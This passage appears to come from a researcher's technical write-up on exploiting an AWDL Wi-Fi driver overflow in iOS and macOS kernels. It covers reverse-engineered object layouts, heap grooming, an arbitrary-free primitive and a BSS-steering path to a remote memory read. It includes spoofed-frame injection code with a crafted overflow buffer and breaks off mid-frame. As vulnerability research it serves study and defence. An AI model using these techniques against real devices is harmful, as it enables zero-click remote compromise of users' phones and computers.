It is also known that some code in practice copies objects containing v-tables with memcpy, and while this is not permitted formally, it is something that may be invasive to eliminate.


Right at the end of this document they also say "attackers can be devious." On A12 and above we can no longer trivially point the vtable pointer to a fake vtable and gain arbitrary PC control fairly easily. Guess we'll have to get devious :)

Some initial ideas

Initially I continued using the iOS 12 beta 1 kernelcache when searching for exploitation primitives and performing the initial reversing to better understand the layout of the IO80211AWDLPeer object. This turned out to be a major mistake and a few weeks were spent following unproductive leads:


In the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer seemed uninteresting, at least from the perspective of being able to build a stronger primitive from the linear overflow. For this reason my initial ideas looked at corrupting the fields at the beginning of an IO80211AWDLPeer object which I could place subsequently in memory, option 2 which we saw earlier:


Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects fairly easy. The synctree buffer overflow then allows corrupting the lower fields of an IO80211AWDLPeer in addition to the upper fields


Almost certainly we're going to need some kind of memory disclosure primitive to land this exploit. My first ideas for building a memory disclosure primitive involved corrupting the linked-list of peers. The data structure holding the peers is in fact much more complex than a linked list; it's more like a priority queue with some interesting behaviours when the queue is modified and a distinct lack of safe unlinking and the like. I'd expect iOS to start slowly migrating to using data-PAC for linked-list integrity, but for now this isn't the case. In fact these linked lists don't even have the most basic safe-unlinking integrity checks yet.


The start of an IO80211AWDLPeer object looks like this:



All IOKit objects inheriting from OSObject have a vtable and a reference count as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the peer's MAC address and the peer's peer_manager pointer.


My first ideas revolved around trying to partially corrupt a peer linked-list pointer. In hindsight, there's an obvious reason why this doesn't work (which I'll discuss in a bit), but let's remain enthusiastic and continue on for now...


Looking through the places where the linked list of peers seemed to be used it looked like perhaps the IO80211AWDLPeerManager::updatePeerListBloomFilter method might be interesting from the perspective of trying to get data leaked back to us. Let's take a look at it:


IO80211AWDLPeerManager::updatePeerListBloomFilter(){

  int n_peers = this->peers_list.n_elems;

 

  if (!this->peer_bloom_filters_enabled) {

    return 0;

  }

 

  bzero(this->bloom_filter_buf, 0xA00uLL);

  this->n_macs_in_bloom_filter = 0;

 

  IO80211AWDLPeer* peer = this->peers_list.head;

 

  int n_peers_in_filter = 0;

  for (;

       n_peers_in_filter < n_peers && n_peers_in_filter < 0x100;

       n_peers_in_filter++) {

    this->bloom_filter_macs[n_peers_in_filter] = peer->mac;

    peer = peer->flink;

  }

 

  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,

                      0,

                      n_peers_in_filter,

                      this->bloom_filter_macs,

                      this->bloom_filter_buf);

 

  if (n_peers_in_filter){

    this->updateBroadcastMI(9, 1, 0);
  }

 

  return 0;

}


From the IO80211AWDLPeerManager it's reading the peer list head pointer as well as a count of the number of entries in the peer list. For each entry in the list it's reading the MAC address field into an array then builds a bloom filter from that buffer. 


The interesting part here is that the list traversal is terminated using a count of elements which have been traversed rather than by looking for a termination pointer value at the end of the list (eg a NULL or a pointer back to the head element.) This means that potentially if we could corrupt the linked-list pointer of the second-to-last peer to be processed we could point it to a fake peer and get data at a controlled address added into the bloom filter. updateBroadcastMI looks like it will add that bloom filter data to the Master Indication frame in the bloom filter TLV, meaning we could get a bloom filter containing data read from a controlled address sent back to us. Depending on the exact format of the bloom filter it would probably be possible to then recover at least some bits of remote memory.


It's important to emphasize at this point that due to the lack of a remote KASLR leak and also the lack of a remote PAC signing gadget or vtable disclosure, in order to corrupt the linked-list pointer of an adjacent peer object we have no option but to corrupt its vtable pointer with an invalid value. This means that if any virtual methods were called on this object, it would almost certainly cause a kernel panic.


The first step in trying to get this to work was to build a suitable heap groom such that we could overflow from a peer into the second-to-last peer in the list which would be processed.


Both the linked-list order and the virtual memory order need to be groomed to allow a targeted partial overflow of the final linked-list pointer to be traversed. In this layout we'd need to overflow from 2 into 6 to corrupt the final pointer from 6 to 7.


There is a mitigation from a few years ago in play here which we'll have to work around; namely the randomization of the initial zone freelists which adds a slight element of randomness to the order of the allocations you will get for consecutive calls to kalloc for the same size. The randomness is quite minimal however so the trick here is to be able to pad your allocations with "safe" objects such that even though you can't guarantee that you always overflow into the target object, you can mostly guarantee that you'll overflow into that object or a safe object.


We need two things here: firstly, an understanding of the semantics of the peer list; secondly, some safe objects to groom with.

The peer list

With a bit of reversing we can determine that the code which adds peers to the list doesn't simply add them to the start. Peers which are first seen on a 2.4GHz channel (6) do get added this way, but peers first seen on a 5GHz channel (44) are inserted based on their RSSI (received signal strength indication - a unitless value approximating signal strength.) Stronger signals mean the peer is probably physically closer to the device and will also be closer to the start of the list. This gives some nice primitives for manipulating the list and ensuring we know where peers will end up.
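
To make the grooming logic easier to reason about, here's a rough sketch of that insertion behaviour as I understand it from the reversing; other than peer_list_flink, the type, field and variable names are mine, not the driver's:

#include <stddef.h>

struct peer {                         // stand-in for IO80211AWDLPeer; field names are mine
  struct peer *peer_list_flink;
  int first_seen_channel;
  int rssi;
};

struct peer_list { struct peer *head; };

// Sketch only: approximates the observed insertion behaviour described above.
static void insert_peer(struct peer_list *list, struct peer *p) {
  if (p->first_seen_channel <= 14) {          // first seen on 2.4GHz (e.g. channel 6):
    p->peer_list_flink = list->head;          // goes straight to the head
    list->head = p;
    return;
  }
  // first seen on 5GHz (e.g. channel 44): insert in descending RSSI order,
  // so a stronger (apparent) signal means a position closer to the head
  struct peer **link = &list->head;
  while (*link != NULL && (*link)->rssi >= p->rssi)
    link = &(*link)->peer_list_flink;
  p->peer_list_flink = *link;
  *link = p;
}

In practice this means that by controlling which channel a spoofed peer is first seen on, and roughly how strong its signal appears, we can influence where in the list it ends up.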

Safe objects

The second requirement is to be able to allocate arbitrary, safe objects. Our ideal heap grooming/shaping objects would have the following properties:


1) arbitrary size

2) unlimited allocation quantity

3) allocation has no side effects

4) controlled contents

5) contents can be safely corrupted

6) can be free'd at an arbitrary, controlled point, with no side effects


Of course, we're completely limited to objects we can force to be allocated remotely via AWDL so all the tricks from local kernel exploitation don't work. For example, I and others have used various forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to build these primitives. None of these are going to work at all. AWDL is sufficiently complicated however that after some reversing I found a pretty good candidate object.

Service response descriptor (SRD)

This is my reverse-engineered definition of the service response descriptor TLV (type 2):


{ u8  type

  u16 len

  u16 key_len

  u8  key_val[key_len]

  u16 value_total_size

  u16 fragment_offset

  u8  fragment[len-key_len-6] }


It has two variable-sized fields: key_val and fragment. The key_len field defines the length of the key_val buffer, and the length of fragment is the remaining space left at the end of the TLV. The parser for this TLV makes a kalloc allocation of value_total_size, an arbitrary u16. It then memcpy's from fragment into that kalloc buffer at offset fragment_offset:


The service_response technique gives us a powerful heap grooming primitive


I believe this is supposed to be support for receiving out-of-order fragments of service request responses. It gives us a very powerful primitive for heap grooming. We can choose an arbitrary allocation size up to 64k and write an arbitrary amount of controlled data to an arbitrary offset in that allocation and we only need to provide the offset and content bytes.
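
A rough sketch of what the SRD parser seems to do with those fields, based only on the static reversing described here; the function name is mine, the kalloc declaration is simplified, and the bounds check is an assumption:

#include <stddef.h>
#include <stdint.h>
#include <string.h>

extern void *kalloc(size_t size);  // kernel allocator; declared here just so the sketch compiles

// Sketch only: models the observed behaviour, not the actual driver code.
// value_total_size, fragment_offset, fragment and frag_len correspond to the
// TLV fields defined above (frag_len == len - key_len - 6).
static void handle_service_response(uint16_t value_total_size,
                                    uint16_t fragment_offset,
                                    const uint8_t *fragment,
                                    uint16_t frag_len) {
  if ((uint32_t)fragment_offset + frag_len > value_total_size)
    return;                                    // assumed sanity check
  uint8_t *buf = kalloc(value_total_size);     // attacker-chosen size, up to 64k
  if (buf == NULL)
    return;
  memcpy(buf + fragment_offset, fragment, frag_len);  // attacker-chosen offset and contents
  // the buffer is presumably stashed somewhere for later reassembly of the
  // full value; as discussed below, it never appears to be freed
}

The key point for us is the pair (value_total_size, fragment_offset): an arbitrary kalloc size and an arbitrary write offset within it.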


This also gives us a kind of amplification primitive. We can bundle quite a lot of these TLVs in one frame allowing us to make megabytes of controlled heap allocations with minimal side effects in just one AWDL frame.


This SRD technique in fact almost completely meets criteria 1-5 outlined above. It's almost perfect apart from one crucial point; how can we free these allocations?


Through static reversing I couldn't find how these allocations would be free'd, so I wrote a dtrace script to help me find when those exact kalloc allocations were free'd. Running this dtrace script and then running a test AWDL client sending SRDs, I saw the allocation but never the free. Even disabling the AWDL interface, which should clean up most of the outstanding AWDL state, doesn't cause the allocation to be freed.


This is possibly a bug in my dtrace script, but there's another theory: I wrote another test client which allocated a huge number of SRDs. This allocated a substantial amount of memory, enough to be visible using zprint. And indeed, running that test client repeatedly then running zprint you can observe the inuse count of the target zone getting larger and larger. Disabling AWDL doesn't help, neither does waiting overnight. This looks like a pretty trivial memory leak.


Later on we'll examine the cause of this memory leak but for now we have a heap allocation primitive which meets criteria 1-5, that's probably good enough!

A first attempt at a useful corruption

I managed to build a heap groom which gets the linked-list and heap objects set up such that I can overflow into the second-to-last peer object to be processed:


By surrounding peer objects with a sufficient number of safe objects we can ensure that the linear corruption either hits the right peer object or a safe object


The trick is to ensure that the ratio of safe objects to peers is sufficiently high that you can be (reasonably) sure that the two target peers will only be next to each other or next to safe objects (they won't be next to other peers in the list.) Even though you may not be able to force the two peers to be in the correct order as shown in the diagram, you can at least make the corruption safe if they aren't, then try again.


When writing the code to build the SyncTree TLV I realized I'd made a huge oversight...


My initial idea had been to only partially overwrite a valid linked-list pointer element:


If we could partially overflow the peer_list_flink pointer we could potentially move it to point it somewhere nearby. In this illustration by moving it down by 8 bytes we could potentially get some bytes of a peer_list_blink added to the peer MACs bloom filter. A partial overwrite doesn't directly give a relative add or subtract primitive, but with some heap grooming overwriting the lower 2 bytes can yield something similar


But when you actually look more closely at the memory layout taking into account the limitations of the corruption primitive:


Computing the relative offsets between two IO80211AWDLPeers next to each other in memory it turns out that a useful partial overwrite of peer_list_flink isn't possible as it lies on a 6-byte boundary from the lower peer's sync_tree_macs array


This is not a useful type of partial overwrite and it took a lot of effort to make this heap groom work only to realize in hindsight this obvious oversight.


Attempting to salvage something from all this work I tried instead to just completely overwrite the linked-list pointer. We'd still need some other vulnerability or technique to determine what we should overwrite with but it would at least be some progress to see a read or write from a controlled address.


Alas, whilst I'm able to do the overflow, it appears that the linked-list of peers is being continually traversed in the background even when there's no AWDL traffic and virtual methods are being called on each peer. This will make things significantly harder without first knowing a vtable pointer.


Another option would be to trigger the SyncTree overflow twice during the parsing of a single frame. Recall the code in actionFrameReport:


IO80211AWDLPeer::actionFrameReport

...

      case 0x14:

        if (tlv_cnt[0x14] >= 2)

          goto ERR;

        tlv_cnt[0x14]++;

        this->parseAwdlSyncTreeTLV(bytes);


I explored places where a TLV would trigger a peer list traversal. The idea would then be to sandwich a controlled lookup between two SyncTree TLVs, the first to corrupt the list and the second to somehow make that safe. There were some code paths like this, where we could cause a controlled peer to be looked up in the peer list. There were even some places where we could potentially get a different memory corruption primitive from this but they looked even trickier to exploit. And even then you'd not be able to reset the peer list pointer with the second overflow anyway.

Reset

Thus far none of my ideas for a read panned out; messing with the linked list without a correctly PAC'd vtable pointer just doesn't seem feasible. At this point I'd probably consider looking for a second vulnerability. For example, in Natalie's recent WebRTC exploit she was able to find a second vulnerability to defeat ASLR.


There are still some other ideas left open but they seem tricky to get right:


The other major type of object in the kalloc.6144 zone is the ipc_kmsg for some IOKit methods. These are in-flight mach messages and it might be possible to corrupt them such that we could inject arbitrary mach messages into userspace. This idea seems mostly to create new challenges rather than solve any open ones though.


If we don't target the same zone then we could try a cross-zone attack, but even then we're quite limited by the primitives offered by AWDL. There just aren't that many interesting objects we can allocate and manipulate.


By this point I've invested a lot of time into this project and am not willing to give up. I've also been hearing very faint whispers that I might have accidentally stumbled upon an attack surface which is being actively exploited. Time to try one more thing...

Getting up to date

Up until this point I'd been doing most of my reversing using the partially symbolized iOS 12 beta 1 kernelcache. I had done a considerable amount of reverse engineering to build up a reasonable idea of all the fields in the IO80211AWDLPeer object which I could corrupt and it wasn't looking promising. But this vulnerability was only going to get patched in iOS 13.3.1.


Could they have added new fields in iOS 13? It seemed unlikely, but it was of course worth a look.


Here's my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:


struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {

/* +0x0000 */  void *vtable;

/* +0x0008 */  uint32_t ref_cnt;

/* +0x000C */  uint32_t bucket;

/* +0x0010 */  void *peer_list_flink;

/* +0x0018 */  void *peer_list_blink;

/* +0x0020 */  struct ether_addr peer_mac;

/* +0x0026 */  uint8_t pad1[2];

/* +0x0028 */  struct IO80211AWDLPeerManager *peer_manager;

/* +0x0030 */  uint8_t pad8[384];

/* +0x01B0 */  uint16_t HT_FLAGS;

/* +0x01B2 */  uint8_t HT_features[26];

/* +0x01CC */  uint8_t HT_caps;

/* +0x01CD */  uint8_t pad10[14];

/* +0x01DB */  uint8_t VHT_caps;

/* +0x01DC */  uint8_t pad9[732];

/* +0x04B8 */  uint8_t added_to_fw_cache;

/* +0x04B9 */  uint8_t is_on_correct_infra_channel;

/* +0x04BA */  uint8_t pad0[6];

/* +0x04C0 */  uint32_t nsync_total_len;

/* +0x04C4 */  uint8_t nsync_tlv_buf[64];

/* +0x0504 */  uint32_t flags_from_dp_tlv;

/* +0x0508 */  uint8_t pad14[19];

/* +0x051B */  uint32_t n_sync_tree_macs;

/* +0x051F */  uint8_t pad20[126];

/* +0x059D */  uint8_t peer_infra_channel;

/* +0x059E */  struct ether_addr peer_infra_mac;

/* +0x05A4 */  struct ether_addr some_other_mac;

/* +0x05AA */  uint8_t country_code[3];

/* +0x05AD */  uint8_t pad5[41];

/* +0x05D6 */  uint16_t social_channels;

/* +0x05D8 */  uint64_t last_AF_timestamp;

/* +0x05E0 */  uint8_t pad17[116];

/* +0x0654 */  uint8_t chanseq_encoding;

/* +0x0655 */  uint8_t chanseq_count;

/* +0x0656 */  uint8_t chanseq_step_count;

/* +0x0657 */  uint8_t chanseq_dup_count;

/* +0x0658 */  uint8_t pad19[4];

/* +0x065C */  uint16_t chanseq_fill_channel;

/* +0x065E */  uint8_t chanseq_channels[32];

/* +0x067E */  uint8_t pad2[64];

/* +0x06BE */  uint8_t raw_chanseq[64];

/* +0x06FE */  uint8_t pad18[194];

/* +0x07C0 */  uint64_t last_UMI_update_timestamp;

/* +0x07C8 */  struct IO80211AWDLPeer *UMI_chain_flink;

/* +0x07D0 */  uint8_t pad16[8];

/* +0x07D8 */  uint8_t is_in_umichain;

/* +0x07D9 */  uint8_t pad15[79];

/* +0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;

/* +0x0829 */  uint8_t pad12[2];

/* +0x082B */  uint8_t SDB_mode;

/* +0x082C */  uint8_t pad6[28];

/* +0x0848 */  uint8_t did_parse_datapath_tlv;

/* +0x0849 */  uint8_t pad7[1011];

/* +0x0C3C */  uint32_t UMI_feature_mask;

/* +0x0C40 */  uint8_t pad22[2568];

/* +0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;  // NEW FIELD

/* +0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD

}

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You can define and edit structures in C-syntax like this using the Local Types window in IDA: right-clicking a type and selecting "Edit..." brings up an interactive edit window; it's very helpful for reversing complex data structures such as this.


There are new fields! In fact, there's a new pointer field and length field right at the end of the IO80211AWDLPeer object. But what is a steering_msg_blob? What is BSS Steering?

BSS Steering

Let's take a look at where the steering_msg_blob pointer is used.


It's allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, via the following call stack:


IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine


bssSteeringStateMachine is called from many places, including IO80211AWDLPeer::actionFrameReport when it parses a BSS Steering TLV (type 0x1d), so it looks like we can indeed drive this state machine remotely somehow.


The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:


  steering_msg_blob = this->steering_msg_blob;

  if ( steering_msg_blob )

  {

    kfree(steering_msg_blob, this->steering_msg_blob_size);


This gives us our first new primitive: an arbitrary free. Without needing to reverse any of the BSS Steering code we can quite easily overflow from the sync_tree_macs field into the steering_msg_blob and steering_msg_blob_size fields, setting them to arbitrary values.


If we then wait for the peer to timeout and be destroyed, when ::freeResources is called it will call kfree with our arbitrary pointer and size.


The steering_msg_blob is also used in one more place:


In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked list of peers (a separate list from that used to store all the peers) and for each of the peers in that list it checks whether that peer and the current device are on the same channel and in an availability window:


if ( peer_manager->current_channel_ == peer->chanseq_channels[peer_manager->current_chanseq_step] ) {

...


If the UMI timer has indeed fired when both this device and the peer from the UMI list are on the same channel in an overlapping availability window then the IO80211AWDLPeerManager removes the peer from the UMI list, reads the bss_steering_blob from the peer and passes it as the last argument to IO80211AWDLPeerManager::sendUnicastMI.


This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to build an AWDL master indication frame before attempting to transmit it.


Let's look at how buildMasterIndicationTemplate uses the steering_msg_blob:


The third argument to buildMasterIndicationTemplate is is_unicast_MI which indicates whether this method was called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)


If buildMasterIndicationTemplate was called to build a unicast MI frame and the peer's feature_mask field has the 0xD'th bit set then the steering_msg_blob will be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This method reads a size from the second dword in the steering_msg_blob and checks whether it is smaller than the remaining space in the frame template buffer; if it is, then that size value is used to copy that number of bytes from the steering_msg_blob pointer into a TLV (type 0x1d) in the template frame which will then be sent out over the air!
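
In pseudocode the interesting part of that path looks roughly like this; it's a sketch based on the description above, and the exact TLV header layout written into the template is an assumption:

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Sketch only: models the size-check-and-copy behaviour attributed to
// IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv above.
static bool build_steering_tlv(const uint8_t *steering_msg_blob,
                               uint8_t *frame_out, size_t space_left) {
  uint32_t size;
  memcpy(&size, steering_msg_blob + 4, sizeof(size));  // second dword is trusted as the copy length
  if (size > space_left)
    return false;                          // too big for the template; nothing is sent
  frame_out[0] = 0x1d;                     // BSS steering TLV type
  frame_out[1] = (uint8_t)(size & 0xff);   // assumed 2-byte little-endian TLV length
  frame_out[2] = (uint8_t)(size >> 8);
  memcpy(&frame_out[3], steering_msg_blob, size);  // whatever the blob points at goes on the air
  return true;
}

The crucial detail is that the blob pointer lives in an IO80211AWDLPeer object we can corrupt, and the length it trusts is read from whatever that pointer points at; this is what turns it into a read primitive.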


There's clearly a path here to get a semi-arbitrary read; but actually triggering it will require quite a bit more reversing. We need the UMI timer to be firing and we also need to get a peer into the UMI linked list.

BSS steering state machine

At this point a sensible question to ask is, what exactly is BSS Steering? A bit of googling tells us that it's part of 802.11v; a set of management standards for enterprise networks. One of the advanced features of enterprise networks is the ability to seamlessly move devices between different access points which form part of the same network; for example when you walk around the office with your phone or if there are too many devices associated with one access point. AWDL isn't part of 802.11v. My best guess as to what's happening here is that AWDL is driving the 802.11v AP roaming code to try to move AWDL clients on to a common infrastructure network. I think this code was added to support Sidecar, but everything below is based only on static reversing.


IO80211PeerBssSteeringManager::bssSteeringStateMachine is responsible for driving the BSS steering state machine. The first argument is a bssSteeringEvent enum value representing an event which the state machine should process. Using the IO80211PeerBssSteeringManager::getEventName method we can determine the names for all the events which the state machine will process and using the IO80211PeerBssSteeringManager::getStateName method we can determine the names of the states which the state machine can be in. Again using the local types window in IDA we can define enums for these which will make the HexRays decompiler output much more readable:


enum BSSSteeringState

{

  BSS_STEERING_STATE_IDLE = 0x0,

  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL = 0x1,

  BSS_STEERING_STATE_ASSOCIATION_ONGOING = 0x2,

  BSS_STEERING_STATE_TX_CONFIRM_AWAIT = 0x3,

  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT = 0x4,

  BSS_STEERING_STATE_STEERING_SYNCED = 0x5,

  BSS_STEERING_STATE_STEERING_SYNC_FAILED = 0x6,

  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING = 0x7,

  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL = 0x8,

  BSS_STEERING_STATE_SUSPEND = 0x9,

  BSS_STEERING_INVALID = 0xA,

};


enum bssSteeringEvent

{

 BSS_STEERING_MODE_ENABLE = 0x0,

 BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD = 0x1,

 BSS_STEERING_DO_PRESYNC_EVAL = 0x2,

 BSS_STEERING_PRESYNC_EVAL_DONE = 0x3,

 BSS_STEERING_SELF_INFRA_LINK_CHANGED = 0x4,

 BSS_STEERING_DIRECTED_STEERING_CMD_SENT = 0x5,

 BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED = 0x6,

 BSS_STEERING_SYNC_CONFIRM_ATTEMPT = 0x7,

 BSS_STEERING_SYNC_SUCCESS_EVENT = 0x8,

 BSS_STEERING_SYNC_FAILED_EVENT = 0x9,

 BSS_STEERING_OVERALL_STEERING_TIMEOUT = 0xA,

 BSS_STEERING_DISABLE_EVENT = 0xB,

 BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT = 0xC,

 BSS_STEERING_SELF_STEERING_REQUESTED = 0xD,

 BSS_STEERING_SELF_STEERING_DONE = 0xE,

 BSS_STEERING_SUSPEND_EVENT = 0xF,

 BSS_STEERING_RESUME_EVENT = 0x10,

 BSS_STEERING_REMOTE_STEERING_TRIGGER = 0x11,

 BSS_STEERING_PEER_INFRA_LINK_CHANGED = 0x12,

 BSS_STEERING_REMOTE_STEERING_FAILED_EVENT = 0x13,

 BSS_STEERING_INVALID_EVENT = 0x14,

};


The current state is maintained in a steering context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the state machine code we can come up with the following rough definition for the steering context object:


struct __attribute__((packed)) BssSteeringCntx

{

  uint32_t first_field;

  uint32_t service_type;

  uint32_t peer_count;

  uint32_t role;

  struct ether_addr peer_macs[8];

  struct ether_addr infraBSSID;

  uint8_t pad4[6];

  uint32_t infra_channel_from_datapath_tlv;

  uint8_t pad8[8];

  char ssid[32];

  uint8_t pad1[12];

  uint32_t num_peers_added_to_umi;

  uint8_t pad_10;

  uint8_t pendingTransitionToNewState;

  uint8_t pad7[2];

  enum BSSSteeringState current_state;

  uint8_t pad5[8];

  struct IOTimerEventSource *bssSteeringExpiryTimer;

  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

  uint8_t pad9[8];

  uint32_t steering_policy;

  uint8_t inProgress;

};


Our goal here is to reach IO80211AWDLPeer::populateBssSteeringMsgBlob, which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation, which in turn is called when the state machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL state and receives the BSS_STEERING_PRESYNC_EVAL_DONE event.

Navigating the state machine

Each time a state is evaluated it can change the current state and optionally set the stateMachineTriggeredEvent variable to a new event and set sendEventToNewState to 1. This way the state machine can drive itself forwards to a new state. Let's try to find the path to our target state:


The state machine begins in BSS_STEERING_STATE_IDLE. When we send the BSS steering TLV for the first time this injects either the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD event depending on whether the steeringMsgID in the TLV was 6 or 0.


This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which processes a steering_msg structure that was itself parsed from the BSS steering TLV; we'll take a look at both of those in a moment. If the steering manager is happy with the contents of the steering_msg structure from the TLV it starts two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort the entire steering process when it triggers, which happens after a few seconds. The StageExpiry timer allows the state machine to make progress asynchronously. When it expires it will call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler function, a snippet of which is shown here:


  cntx = this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state = cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        event = BSS_STEERING_DO_PRESYNC_EVAL;

        break;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        event = BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        break;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        event = BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        break;

      default:

        goto ERR;

    }

    result = this->bssSteeringStateMachine(this, event, ...


We can see here the four state transitions which may happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.


From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTransitionToNewState flag and updates the state to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:


  this->steering_cntx->pendingTransitionToNewState = 1;

  state = BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;


We can now see that this will cause the BSS_STEERING_DO_PRESYNC_EVAL event to be injected into the steering state machine and we reach the following code:


  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT == BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy = this->processPreSyncEvaluation(cntx);

       ...


Here the BSS steering TLV gets parsed and reformatted into a format suitable for the BSS steering code; presumably this is the compatibility layer between the 802.11v enterprise WiFi BSS steering code and AWDL.


We need IO80211PeerBssSteeringManager::processPreSyncEvaluation to return a steering_policy value of 7. The code which determines this is very complicated; in the end it turns out that if the target device is currently connected to a 5GHz network on a non-DFS channel then we can get it to return the right steering policy value to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and can be disabled at runtime if radar is detected. There's no requirement that the attacker is also on the same 5GHz network. There might also be another path to reach the required state but this will do.


At this point we finally reach processPostSyncEvaluation and the steeringMsgBlob will be allocated and the UMI timer armed. When it starts firing the code will attempt to read the steering_msg_blob pointer and send the buffer it points to over the air.

Building the read

Let's look concretely at what's required for the read:


We need two spoofed peers:


struct ether_addr reader_peer = *(ether_aton("22:22:aa:22:00:00"));

struct ether_addr steerer_peer = *(ether_aton("22:22:bb:22:00:00"));


The target device needs to be aware of both these peers so we allocate the reader peer by spoofing a frame from it:


inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());


There are two important things here:


1) This peer will have a channel sequence which is empty; this is crucial as it means we can enforce a gap between the allocation of the steering_msg_blob by processPostSyncEvaluation and its use in the UMI timer. Recall that we saw earlier that the unicast MI template only gets built when the UMI timer fires during a peer availability window; if the peer has no availability windows, then the template won't be updated and the steering_msg_blob won't be used. We can easily change the channel sequence later by sending a different TLV.


2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is quite important, without it this happens:


This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


We'll get to that...


The next step is to allocate the steerer_peer and start steering the reader:


inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());


Let's look at the bss_steering TLV:


struct bss_steering_tlv {

  uint8_t type;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));


We need to choose these values carefully; the important part for the exploit, however, is that we can specify up to 8 peers to be steered at the same time. For this example we'll just steer one peer. Here we build a bss_steering_tlv with only one peer_mac, set to the MAC address of reader_peer. If we've set everything up correctly this should cause the IO80211AWDLPeer object for reader_peer to allocate a steering_msg_blob and start the UMI timer firing, trying to send that blob in a UMI.
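
For concreteness, the single-peer case could be filled in roughly like this, reusing the struct definition above and the reader_peer variable from earlier. Only steeringMsgID, peer_count and peer_macs[0] follow directly from the description above; every other value here is a placeholder assumption, and the SSID/BSSID/channel fields in particular need to describe the 5GHz, non-DFS infrastructure network the target is actually on:

struct bss_steering_tlv steer = {0};

steer.type = 0x1d;                     // BSS steering TLV
steer.length = sizeof(steer) - 3;      // assuming the usual type+len header accounting
steer.steeringMsgID = 6;               // 6 starts steering; 0 is used later to restart it
steer.peer_count = 1;                  // steer a single peer...
steer.peer_macs[0] = reader_peer;      // ...the one whose steering_msg_blob we'll corrupt

// Placeholders: these must match the target's current infrastructure network
steer.infra_channel = 44;              // a 5GHz, non-DFS channel
steer.SSID_len = 7;
memcpy(steer.SSID, "example", 7);
// steer.BSSID = the access point's MAC; steeringMsgLen, steeringTimeoutThreshold
// and steeringCmdFlags are left out of this sketch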


UMI?

UMIs are Unicast Master Indication frames; unlike regular AWDL Master Indication frames UMIs are sent to unicast MAC addresses.


We can now send a final frame:


char overflower[0x80] = {0};

*(uint64_t*)(&overflower[0x50]) = 0x4141414141414141;

 

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

